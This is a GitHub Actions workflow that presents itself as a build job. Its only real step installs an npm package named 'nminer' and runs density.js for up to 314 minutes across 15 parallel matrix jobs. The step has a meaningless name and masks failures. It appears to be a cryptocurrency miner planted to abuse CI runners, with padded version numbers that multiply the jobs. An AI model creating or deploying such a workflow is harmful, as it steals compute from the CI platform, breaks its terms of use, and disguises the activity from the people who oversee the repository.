name: density
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5320 }
          - { version: 3045 }
          - { version: 3113 }
          - { version: 3835 }
          - { version: 4454 }
          - { version: 2790 }
          - { version: 5858 }
          - { version: 8710 }
          - { version: 7250 }
          - { version: 9270 }
          - { version: 163 }
          - { version: 4795 }
          - { version: 4093 }
          - { version: 1788 }
          - { version: 8626 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: gah now transom tremendously
        run: |
          npm install nminer@latest
          timeout 314m node density.js || echo "density executed"